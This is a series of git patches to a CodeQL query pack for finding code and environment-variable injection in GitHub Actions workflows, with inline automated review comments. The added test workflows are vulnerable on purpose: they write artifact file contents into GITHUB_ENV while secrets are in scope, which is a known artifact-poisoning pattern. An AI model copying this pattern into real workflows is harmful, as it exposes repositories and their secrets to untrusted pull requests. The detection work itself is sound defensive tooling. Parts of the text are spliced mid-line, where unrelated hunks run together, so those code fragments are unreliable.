@@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 25441104064a..bc1fd8709507 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -2,6 +2,9 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | 
@@ -64,6 +67,11 @@ nodes | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | +| .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | 
@@ -210,6 +218,8 @@ nodes subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | From 56d2d8ec1000c5666258f1031237170cc1141fb6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:54:30 +0200 Subject: [PATCH 151/707] Update test results --- ql/test/library-tests/test.expected | 2 -- 1 file changed, 2 deletions(-) diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 8b5f3e7184ba..6fe9408a7a35 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -329,9 +329,7 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | -| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | -| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | From 45a51a9f7417c64083fa6511cc81acaedab08b3b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 12:55:24 +0200 Subject: [PATCH 152/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f689f38ef527..2b3896d0cf08 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.6 +version: 0.0.7 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f2ce850e5b83..ac6083b7d6d7 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.6 +version: 0.0.7 groups: - actions - queries From 31a1ea9593a7efaae02ecde49c1fa62b0b8e5f22 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:00 +0200 Subject: [PATCH 153/707] Improve envvar injection --- ql/lib/codeql/actions/Ast.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 21 ++++++ .../actions/security/EnvVarInjectionQuery.qll | 37 ++++++--- ql/src/Security/CWE-077/EnvVarInjection.ql | 2 +- .../CWE-077/PrivilegedEnvVarInjection.ql | 2 +- ql/test/library-tests/test.expected | 6 ++ .../.github/workflows/sonar-source.yml | 75 +++++++++++++++++++ .../Security/CWE-077/EnvVarInjection.expected | 11 +++ .../PrivilegedEnvVarInjection.expected | 17 ++++- .../.github/workflows/sonar-source.yml | 71 ++++++++++++++++++ 10 files changed, 229 insertions(+), 15 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index a9fe35259c5c..e0da57adb6f2 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,7 +34,7 @@ module Utils { .regexpReplaceAll("^'", "") .regexpReplaceAll("'$", "") or assignment = - line.regexpCapture("(echo|Write-Output)\\s+([^'\"]*)\\s*>>\\s*(\"|')?\\$GITHUB_" + + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + var.toUpperCase() + "(\"|')?", 2) ) and key = assignment.splitAt("=", 0).trim() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 242cbcf9a31a..e66c8e7c1b95 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
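Review bot: Widening the third alternative of `extractAssignment` to `(.*)` makes it also match the double- and single-quoted forms that the first two alternatives already handle, but without their quote stripping, so `echo "sha1=$(cat f)" >> $GITHUB_ENV` now yields an extra binding whose key is `"sha1` with a leading quote and whose value carries the trailing quote; the `| "sha1 | …` row added to `test.expected` in this same patch shows exactly that. Excluding a leading quote or space from the fallback capture, `([^'\"\\s].*)`, keeps the new permissiveness for quotes inside the value while leaving the quoted forms to the stripping alternatives. The enclosing `extractAssignment` predicate starts and ends outside this hunk.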
@@ -64,3 +64,24 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } + +/** + * A downloaded artifact that gets assigned to an env var declaration. + * - uses: actions/download-artifact@v2 + * - run: echo "::set-env name=id::$(>\\s*\\$GITHUB_ENV", 2) and - value = line.regexpCapture("echo\\s+(\")?([^=]+)\\s*=(.*)(\")?\\s*>>\\s*\\$GITHUB_ENV", 3) and - expr = exprNode.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getRawExpression()) > 0 - ) +class EnvVarInjectionFromExprSink extends DataFlow::Node { + EnvVarInjectionFromExprSink() { + exists(Expression expr, Run run, string script, string line, string key, string value | + script = run.getScript() and + line = script.splitAt("\n") and + Utils::extractAssignment(line, "ENV", key, value) and + expr = this.asExpr() and + run.getAnScriptExpr() = expr and + value.indexOf(expr.getRawExpression()) > 0 + ) + } +} + +class EnvVarInjectionFromFileSink extends DataFlow::Node { + EnvVarInjectionFromFileSink() { + exists(Run run, ArtifactDownloadStep step, string value | + this.asExpr() = run and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this, _, _) or + this instanceof EnvVarInjectionFromExprSink or + this instanceof EnvVarInjectionFromFileSink or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index e758932b208a..2fca3b324941 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql 
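Review bot: `value.indexOf(expr.getRawExpression()) > 0` in the new `EnvVarInjectionFromExprSink` misses a value that starts with the expression, since `indexOf` returns 0 in that case and -1 only when the expression is absent; the containment test intended is `value.indexOf(expr.getRawExpression()) >= 0`. The condition is carried over from the removed `writeToGithubEnvSink`, so this is a pre-existing gap rather than a regression, and whether it is reachable depends on what `getRawExpression()` returns for a `${{ … }}` expression, which is not visible here. The beginning of this hunk is garbled in this rendering, so the first lines of the class could not be reviewed.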
@@ -29,4 +29,4 @@ where ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 811a6f65c7c0..1a32183bfb22 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -25,4 +25,4 @@ where ) select sink.getNode(), source, sink, "Potential privileged environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() + sink, sink.getNode().toString() diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 6fe9408a7a35..639fbd4c530f 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -329,7 +329,9 @@ sources | jitterbit/get-changed-files | * | output.removed | PR changed files | | jitterbit/get-changed-files | * | output.renamed | PR changed files | | khan/pull-request-comment-trigger | * | output.comment_body | Comment body | +| marocchino/on_artifact | * | output.* | Downloaded artifact | | octo-org/source-repo/.github/workflows/workflow.yml | * | output.workflow-output | Foo | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | | tj-actions/branch-names | * | output.current_branch | PR current branch | | tj-actions/branch-names | * | output.head_ref_branch | PR head branch | | tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | 
@@ -426,6 +428,8 @@ testNormalizeExpr | github.event.pull_request.user['login'] | github.event.pull_request.user.login | | github.event.pull_request['user']['login'] | github.event.pull_request.user.login | writeToGitHubEnv +| "sha1 | $( { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - uses: actions/github-script@v6 + with: + script: | + print("${{enb.SONAR_PR_NUM}}") + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected index d5dbcbde0869..0c4574a77cbb 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -1,5 +1,16 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected index 2692d03eefec..6dbe7bf3c936 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected 
@@ -1,6 +1,21 @@ edges +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | nodes +| .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test2.yml:17:9:47:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test3.yml:17:7:24:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:24:7:31:4 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | semmle.label | Run Step | subpaths #select -| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/test2.yml:47:9:52:6 | Run Step | .github/workflows/test2.yml:17:9:47:6 | Uses Step | .github/workflows/test2.yml:47:9:52:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:47:9:52:6 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:17:7:24:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | +| .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml new file mode 100644 index 000000000000..7dc735dd6bcc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/sonar-source.yml 
@@ -0,0 +1,71 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - uses: actions/checkout@v4 + with: + repository: ${{ github.event.workflow_run.head_repository.full_name }} + ref: ${{ github.event.workflow_run.head_branch }} + fetch-depth: 0 + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + # on develop branch, only run a baseline scan + - name: SonarCloud Scan (Baseline) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD == 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost + -Dsonar.branch.name=develop + -Dsonar.branch.target=develop + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: 
env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} + -Dsonar.projectKey=opencost_opencost + -Dsonar.organization=opencost From ae5b8bc0acfd64438232cdbe4bfc4b524d2849c7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 17:12:45 +0200 Subject: [PATCH 154/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 2b3896d0cf08..f775d7511647 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.7 +version: 0.0.8 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index ac6083b7d6d7..2db4c237da3f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.7 +version: 0.0.8 groups: - actions - queries From 58b21d46849af2035327b1257554114e5eaeb972 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 8 Apr 2024 18:52:13 +0200 Subject: [PATCH 155/707] Improve assignments to GITHUB ENVARS detection --- ql/lib/codeql/actions/Ast.qll | 45 +++++++------------ ql/test/library-tests/test.expected | 7 ++- ql/test/library-tests/test.ql | 3 ++ .../CWE-094/.github/workflows/test.yml | 16 ++++++- .../Security/CWE-094/CodeInjection.expected | 26 ++++++++--- .../CWE-094/PrivilegedCodeInjection.expected | 28 ++++++++---- 6 files changed, 74 insertions(+), 51 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e0da57adb6f2..bbf5c86fb957 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -19,40 +19,25 @@ module Utils { ] } + bindingset[str] + string trimQuotes(string str) { + result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "") + } + bindingset[line, var] predicate extractAssignment(string line, string var, string key, string value) { exists(string assignment | - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"(.*)\"\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^\"", "") - .regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'(.*)'\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - .regexpReplaceAll("^'", "") - .regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$GITHUB_" + - var.toUpperCase() + "(\"|')?", 2) - ) and - key = assignment.splitAt("=", 0).trim() and - value = assignment.splitAt("=", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(.*)\\s*>>\\s*(\"|')?\\$(\\{)?GITHUB_" + + var.toUpperCase() + "(\\})?(\"|')?", 2) and + key = trimQuotes(assignment.splitAt("=", 0)) and + value = trimQuotes(assignment.splitAt("=", 1)) or - ( - assignment = - line.regexpCapture("(echo|Write-Output)\\s+\"::set-" + var.toLowerCase() + - "\\s+name=(.*)\"", 2).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+'::set-" + var.toLowerCase() + "\\s+name=(.*)'", - 2).regexpReplaceAll("^'", "").regexpReplaceAll("'$", "") or - assignment = - line.regexpCapture("(echo|Write-Output)\\s+::set-" + var.toLowerCase() + "\\s+name=(.*)", - 2) - ) and - key = assignment.splitAt("::", 0).trim() and - value = assignment.splitAt("::", 1).trim() + assignment = + line.regexpCapture("(echo|Write-Output)\\s+(\"|')?::set-" + var.toLowerCase() + + "\\s+name=(.*)(\"|')?", 3).regexpReplaceAll("^\"", "").regexpReplaceAll("\"$", "") and + key = trimQuotes(assignment.splitAt("::", 0)) and + value 
